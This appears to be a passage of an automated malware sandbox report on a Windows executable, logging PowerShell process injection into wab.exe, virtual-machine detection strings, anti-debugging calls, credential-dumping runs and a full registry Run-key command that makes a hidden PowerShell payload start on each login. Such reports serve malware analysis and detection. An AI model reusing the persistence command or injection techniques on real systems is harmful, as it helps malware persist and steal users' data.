              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8345Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1375Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 835Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.9 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6640Thread sleep count: 835 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_236610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_236610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23666580 FindFirstFileExA,7_2_23666580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Jump to behavior
              Source: Evgh. rvs Armenia. 30.04.2024.exe, 00000000.00000003.2032768742.000000000344F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}``
              Source: Evgh. rvs Armenia. 30.04.2024.exe, 00000000.00000003.2032768742.000000000344F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `3c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}XX
              Source: wab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.3256333673.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Evgh. rvs Armenia. 30.04.2024.exe, 00000000.00000003.2032768742.000000000344F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
              Source: powershell.exe, 00000002.00000002.2977567691.0000000007799000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.2
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3552
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3556
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_12-34115
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23668EC8 LdrInitializeThunk,7_2_23668EC8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_23662639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23664AB4 mov eax, dword ptr fs:[00000030h]7_2_23664AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_2366724E GetProcessHeap,7_2_2366724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_23662B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_23662639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_236660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_236660E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 273F8B4Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%ufuldbaarnes% -windowstyle minimized $nonconjecturably=(get-itemproperty -path 'hkcu:\nausea\').wryer;%ufuldbaarnes% ($nonconjecturably)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%ufuldbaarnes% -windowstyle minimized $nonconjecturably=(get-itemproperty -path 'hkcu:\nausea\').wryer;%ufuldbaarnes% ($nonconjecturably)"Jump to behavior
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerdows
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*q
              Source: wab.exe, 00000007.00000002.3256333673.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662933 cpuid 7_2_23662933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23662264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_23662264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
